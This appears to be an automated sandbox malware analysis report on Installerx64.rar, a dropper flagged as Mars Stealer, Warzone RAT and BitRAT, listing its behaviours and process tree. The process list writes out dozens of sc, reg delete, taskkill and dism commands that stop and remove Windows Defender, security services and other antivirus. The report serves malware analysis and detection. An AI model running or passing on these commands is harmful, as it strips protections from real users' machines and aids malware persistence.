Analysis Overview
SHA256
bccc4ed85a1cca9413814ceaf90a4e12de07e5b0a07963ca6ea0a8b40a926550
Threat Level: Known bad
The file Installerx64.rar was found to be: Known bad.
Malicious Activity Summary
Mars Stealer
WarzoneRat, AveMaria
Modifies security service
BitRAT
Warzone RAT payload
Executes dropped EXE
Stops running service(s)
Loads dropped DLL
Checks computer location settings
Adds Run key to start application
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Program Files directory
Drops file in Windows directory
Launches sc.exe
Enumerates physical storage devices
Suspicious use of SetWindowsHookEx
Modifies registry class
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: CmdExeWriteProcessMemorySpam
Kills process with taskkill
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-01-03 19:43
Signatures
Analysis: behavioral3
Detonation Overview
Submitted
2023-01-03 19:42
Reported
2023-01-03 19:47
Platform
win7-20220901-en
Max time kernel
137s
Max time network
156s
Command Line
Signatures
BitRAT
Mars Stealer
Modifies security service
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wscsvc\Security | C:\Windows\SysWOW64\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wscsvc\Parameters | C:\Windows\SysWOW64\reg.exe | N/A |
WarzoneRat, AveMaria
Warzone RAT payload
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft.exe | N/A |
| N/A | N/A | C:\Program Files\Builded.exe | N/A |
| N/A | N/A | C:\Program Files\installerX32.exe | N/A |
| N/A | N/A | C:\Program Files\InstallerX64.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft office.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\dismhost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\784DD60B-C17F-4E86-AED3-9D4D425937F5\dismhost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\EB7D771E-B6C3-4321-8F1A-16451039F157\dismhost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\AA47FAFD-C26F-4249-801D-B46DB82C2EA3\dismhost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\62FB9DB2-9133-4809-94F1-C30E850FFA2C\dismhost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\CEB8ED30-4469-43B8-845D-136C5A9ACA43\dismhost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\B9176574-69F7-430A-A225-5140D0BB8FF4\dismhost.exe | N/A |
Stops running service(s)
Loads dropped DLL
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Local\\temp\\svchost" | C:\Program Files\Microsoft office.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program Files\\Microsoft.exe" | C:\Program Files\Microsoft.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft office.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft office.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft office.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft office.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\__tmp_rar_sfx_access_check_7084333 | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx64.exe | N/A |
| File created | C:\Program Files\installerX32.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx64.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft office.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx64.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\MpClient.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\MpOAV.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\en-US\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\MpCommu.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\it-IT\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\de-DE\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\MpAsDesc.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\installerX32.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx64.exe | N/A |
| File created | C:\Program Files\InstallerX64.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx64.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\en-US\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\MpAsDesc.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx64.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\MpCmdRun.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\MsMpLics.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\InstallerX64.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx64.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\en-US\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\MpOAV.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\MpRTP.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\ja-JP\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Program Files\Builded.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx64.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\MpEvMsg.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\MsMpCom.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\en-US\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\es-ES\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\en-US\MsMpRes.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\MsMpLics.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\fr-FR\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\MpClient.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\MpSvc.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Program Files\Microsoft office.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx64.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\MSASCui.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\MsMpRes.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Program Files\Microsoft.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx64.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Builded.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx64.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Windows\system32\Dism.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Users\Admin\AppData\Local\Temp\B9176574-69F7-430A-A225-5140D0BB8FF4\dismhost.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Users\Admin\AppData\Local\Temp\784DD60B-C17F-4E86-AED3-9D4D425937F5\dismhost.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Windows\system32\Dism.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Users\Admin\AppData\Local\Temp\EB7D771E-B6C3-4321-8F1A-16451039F157\dismhost.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Users\Admin\AppData\Local\Temp\CEB8ED30-4469-43B8-845D-136C5A9ACA43\dismhost.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\dismhost.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Users\Admin\AppData\Local\Temp\62FB9DB2-9133-4809-94F1-C30E850FFA2C\dismhost.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Windows\system32\Dism.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Windows\system32\Dism.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Windows\system32\Dism.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Windows\system32\Dism.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Users\Admin\AppData\Local\Temp\AA47FAFD-C26F-4249-801D-B46DB82C2EA3\dismhost.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Windows\system32\Dism.exe | N/A |
Launches sc.exe
Enumerates physical storage devices
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\System32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious behavior: CmdExeWriteProcessMemorySpam
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Microsoft office.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Microsoft office.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft office.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft office.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx64.exe
"C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx64.exe"
C:\Program Files\Microsoft.exe
"C:\Program Files\Microsoft.exe"
C:\Program Files\Builded.exe
"C:\Program Files\Builded.exe"
C:\Program Files\installerX32.exe
"C:\Program Files\installerX32.exe"
C:\Program Files\InstallerX64.exe
"C:\Program Files\InstallerX64.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1BCB.tmp\1BCC.tmp\1BCD.bat "C:\Program Files\InstallerX64.exe""
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1BBC.tmp\1BBD.tmp\1BBE.bat "C:\Program Files\installerX32.exe""
C:\Program Files\Microsoft office.exe
"C:\Program Files\Microsoft office.exe"
C:\Windows\system32\cacls.exe
"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKEY_CLASSES_ROOT\CLSID\{5FDD51E2-A9D0-44CE-8C8D-162BA0C591A0}" /v "Version"
C:\Windows\system32\sc.exe
sc stop windefend
C:\Windows\system32\reg.exe
reg query "HKEY_CLASSES_ROOT\CLSID\{5FDD51E2-A9D0-44CE-8C8D-162BA0C591A0}" /v "Version"
C:\Windows\system32\sc.exe
sc config windefend start= disabled
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\InboxApplications\Microsoft.Windows.SecHealthUI__neutral_neutral_cw5n1h2txyewy" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CLASSES_ROOT\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-AM-Default-Definitions-Package~31bf3856ad364e35~amd64~~\Owners" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CLASSES_ROOT\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-AppLayer-Group-amcore-Package~31bf3856ad364e35~amd64~~\Owners" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-AppLayer-Group-onecore-Package~31bf3856ad364e35~amd64~~\Owners" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-AppLayer-Group-Package~31bf3856ad364e35~amd64~~\Owners" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-ApplicationGuard-Inbox-Package~31bf3856ad364e35~amd64~~\Owners" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Client-Package~31bf3856ad364e35~amd64~~\Owners" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-CloudClean-Group-Package~31bf3856ad364e35~amd64~~\Owners" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Core-Group-amcore-Package~31bf3856ad364e35~amd64~~\Owners" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Core-Group-onecore-Package~31bf3856ad364e35~amd64~~\Owners" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Core-Group-Package~31bf3856ad364e35~amd64~~\Owners" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Group-Policy-Package~31bf3856ad364e35~amd64~~\Owners" /f
C:\Windows\system32\sc.exe
sc delete windefend
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-Group-amcore-Package~31bf3856ad364e35~amd64~~\Owners" /f
C:\Windows\system32\sc.exe
sc config WdNisSvc start= disabled
C:\Windows\system32\sc.exe
sc delete WdNisSvc
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-MDM-Group-Package~31bf3856ad364e35~amd64~~\Owners" /f
C:\Windows\system32\sc.exe
sc stop wuauserv
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~\Owners" /f
C:\Windows\system32\sc.exe
sc delete Sense
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Nis-Group-Package~31bf3856ad364e35~amd64~~\Owners" /f
C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Shield-Provider-Core-Package~31bf3856ad364e35~amd64~~\Owners" /f
C:\Windows\system32\sc.exe
sc config Sense start= disabled
C:\Windows\system32\sc.exe
sc stop Sense
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-Group-Package~31bf3856ad364e35~amd64~~\Owners" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-Group-onecore-Package~31bf3856ad364e35~amd64~~\Owners" /f
C:\Windows\system32\sc.exe
sc stop WdNisSvc
C:\Windows\system32\Dism.exe
dism /online /remove-package /packagename:Windows-Defender-AM-Default-Definitions-Package~31bf3856ad364e35~amd64~~ /NoRestart
C:\Windows\system32\sc.exe
sc stop usosvc
C:\Windows\system32\sc.exe
sc config usosvc start= disabled
C:\Windows\system32\sc.exe
sc stop WaasMedicSvc
C:\Windows\system32\sc.exe
sc config WaasMedicSvc start= disabled
C:\Windows\system32\sc.exe
sc stop SecurityHealthService
C:\Windows\system32\sc.exe
sc config SecurityHealthService start= disabled
C:\Windows\system32\sc.exe
sc delete SecurityHealthService
C:\Windows\system32\sc.exe
sc stop SDRSVC
C:\Windows\system32\sc.exe
sc config SDRSVC start= disabled
C:\Windows\system32\sc.exe
sc stop wscsvc
C:\Windows\system32\sc.exe
sc config wscsvc start= disabled
C:\Windows\system32\sc.exe
sc stop WdiServiceHost
C:\Windows\system32\sc.exe
sc config WdiServiceHost start= disabled
C:\Windows\system32\sc.exe
sc stop WdiSystemHost
C:\Windows\system32\sc.exe
sc config WdiSystemHost start= disabled
C:\Windows\system32\sc.exe
sc stop InstallService
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\dismhost.exe {46B2E577-34B9-4AF4-89A3-F6022FB712B2}
C:\Windows\system32\sc.exe
sc config InstallService Start= disabled
C:\Windows\system32\sc.exe
sc stop VaultSvc
C:\Windows\system32\sc.exe
sc config VaultSvc start= disabled
C:\Windows\system32\sc.exe
sc stop Spooler
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding
C:\Windows\system32\sc.exe
sc config Spooler start= disabled
C:\Windows\system32\sc.exe
sc stop LicenseManager
C:\Windows\system32\sc.exe
sc config LicenseManager start= disabled
C:\Windows\system32\sc.exe
sc stop DiagTrack
C:\Windows\system32\sc.exe
sc config DiagTrack start= disabled
C:\Windows\system32\taskkill.exe
taskkill /f /im smartscreen.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im SecurityHealthService.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im MpCopyAccelerator.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im MpCopyAccelerator.exe
C:\Windows\System32\taskkill.exe
taskkill /f /im SecurityHealthService.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im SystemSettings.exe
C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center" /f
C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center" /f
C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection" /f
C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Security Health" /f
C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdBoot" /f
C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdFilter" /f
C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdNisDrv" /f
C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdNisSvc" /f
C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc" /f
C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v SecurityHealth /f
C:\Windows\SysWOW64\sc.exe
sc delete windefend
C:\Windows\SysWOW64\sc.exe
sc delete sense
C:\Windows\SysWOW64\sc.exe
sc stop nsWscSvc
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im MBAMWsc.exe
C:\Windows\SysWOW64\sc.exe
sc stop MBAMService
C:\Windows\SysWOW64\sc.exe
sc config MBAMService start= disabled
C:\Windows\SysWOW64\sc.exe
sc delete MBAMService
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im MBAM.exe
C:\Windows\SysWOW64\sc.exe
sc stop Bytefenceservice
C:\Windows\SysWOW64\sc.exe
sc config Bytefenceservice start= disabled
C:\Windows\SysWOW64\sc.exe
sc delete Bytefenceservice
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Bytefence.exe
C:\Windows\system32\sc.exe
sc stop "avast! Tools"
C:\Windows\system32\sc.exe
sc config "avast! Tools" start= disabled
C:\Windows\system32\sc.exe
sc delete "avast! Tools"
C:\Windows\system32\sc.exe
sc stop "avast! Antivirus"
C:\Windows\system32\sc.exe
sc config "avast! Antivirus" start= disabled
C:\Windows\system32\Dism.exe
dism /online /remove-package /packagename:Windows-Defender-AppLayer-Group-amcore-Package~31bf3856ad364e35~amd64~~ /NoRestart
C:\Users\Admin\AppData\Local\Temp\784DD60B-C17F-4E86-AED3-9D4D425937F5\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\784DD60B-C17F-4E86-AED3-9D4D425937F5\dismhost.exe {781245A3-F951-4894-B4A2-ECF2FB16E10E}
C:\Windows\system32\Dism.exe
dism /online /remove-package /packagename:Windows-Defender-AppLayer-Group-onecore-Package~31bf3856ad364e35~amd64~~ /NoRestart
C:\Users\Admin\AppData\Local\Temp\EB7D771E-B6C3-4321-8F1A-16451039F157\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\EB7D771E-B6C3-4321-8F1A-16451039F157\dismhost.exe {64056711-BE73-4542-B1B7-39077A9BD8A8}
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\system32\Dism.exe
dism /online /remove-package /packagename:Windows-Defender-AppLayer-Group-Package~31bf3856ad364e35~amd64~~ /NoRestart
C:\Users\Admin\AppData\Local\Temp\AA47FAFD-C26F-4249-801D-B46DB82C2EA3\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\AA47FAFD-C26F-4249-801D-B46DB82C2EA3\dismhost.exe {3C79E263-B682-4DFC-B0E1-0CBD044C52B5}
C:\Windows\system32\Dism.exe
dism /online /remove-package /packagename:Windows-Defender-ApplicationGuard-Inbox-Package~31bf3856ad364e35~amd64~~ /NoRestart
